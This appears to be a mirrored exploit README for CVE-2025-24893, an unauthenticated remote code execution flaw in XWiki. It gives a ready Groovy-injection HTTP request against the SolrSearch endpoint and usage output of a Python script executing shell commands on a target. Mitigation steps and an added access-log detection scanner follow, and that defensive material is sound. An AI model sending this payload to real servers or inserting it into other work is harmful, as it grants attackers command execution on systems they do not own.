Introduction

# Exploit for CVE-2025-24893
**CVE-2025-24893** is a **critical unauthenticated remote code execution (RCE)** vulnerability affecting the **XWiki Platform**.  
This flaw lets any guest user inject and execute arbitrary **Groovy code**—without authentication—via a specially crafted RSS request to the **SolrSearch** endpoint.
This directly impacts the **confidentiality, integrity, and availability** of the affected system.
### Summary
- **Affected Versions:**
  - XWiki ≥ 5.3-milestone-2 up to < 15.10.11
  - XWiki ≥ 16.0.0-rc-1 up to < 16.4.1
- **CVSS v3.1 Score:** 9.8 (**Critical**)  
  Vector: `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
- **Exploitability:** Very easy — a single HTTP GET request is enough.
---
> ⚠️ **Disclaimer:**  
>
> This code is strictly intended for educational and research purposes only. Unauthorized use on systems without explicit permission may constitute a violation of the law. 
> The author is not responsible for any misuse or malicious activity involving this tool.
### Proof-of-Concept (POC)
```http
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
```
---
## Usage Manual for the Exploit Script
This section explains how to set up and run the Python exploit script to take advantage of **CVE-2025-24893**.
---
```text
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
```
```text
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
```
## Mitigation
### Update to fixed versions:
To patch the vulnerability, update XWiki to one of the following versions:
- **XWiki 15.10.11**
- **XWiki 16.4.1**
- **XWiki 16.5.0 RC1**
---
### Temporary Workaround:
If an update is not immediately possible, you can apply a temporary fix:
1. Edit the file **`SolrSearchMacros.xml`** (located at `Main.SolrSearchMacros`) around **line 955**.
2. Replace the output logic to use the **`rawResponse`** macro with the content type set to `application/xml`.  
   Use the implementation found in `macros.vm` at **line 2824** as a reference.
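Until the update or workaround is in place, exploitation attempts are easy to spot in web server access logs, because the payload must reach the `SolrSearch` endpoint through the `text` parameter with the `{{async}}`/`{{groovy}}` macro markers shown in the PoC above. The following scanner is an added example (not part of this repository): it parses Combined Log Format lines, URL-decodes the `text` value and flags those markers; the sample log lines are constructed, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a Combined Log Format entry: method, target, protocol.
_REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers of the wiki-syntax injection used by CVE-2025-24893: the closing
# braces break out of the search text, then {{async}}/{{groovy}} run code.
_INJECTION_MARKERS = ("{{groovy}}", "{{async", "{{/groovy}}")


def is_cve_2025_24893_attempt(log_line: str) -> bool:
    """Return True if an access-log line targets the SolrSearch endpoint
    with a Groovy macro injected into the `text` parameter."""
    m = _REQ_RE.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/bin/get/Main/SolrSearch"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("text", []):
        # parse_qs decoded once; decode again in case of double encoding.
        decoded = unquote(value).lower()
        if any(marker in decoded for marker in _INJECTION_MARKERS):
            return True
    return False


def scan(lines):
    """Return the log lines flagged as exploitation attempts."""
    return [line for line in lines if is_cve_2025_24893_attempt(line)]


# Constructed sample lines; the second mirrors the encoded payload shape
# shown in the usage section of this README.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Aug/2025:10:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=deployment HTTP/1.1" 200 1320',
    '10.0.0.9 - - [01/Aug/2025:10:00:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(1)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Aug/2025:10:00:03 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("[!] possible CVE-2025-24893 attempt:", hit)
```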
**References:**
- [NVD - CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
- [Ionix Blog](https://www.ionix.io/blog/xwiki-remote-code-execution-vulnerability-cve-2025-24893/)
- [Miggo.io](https://www.miggo.io/vulnerability-database/cve/CVE-2025-24893)
        
        文件快照
        
            
                
 [4.0K]  /data/pocs/94cd7303c1579f8a5422c17e212474aac6b63aea
├── [1.6K]  CVE-2025-24893.py
└── [2.8K]  README.md
0 directories, 2 files
                
             
         
Notes

1. It is recommended to access the POC through its original source first.
2. If the source has gone offline or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.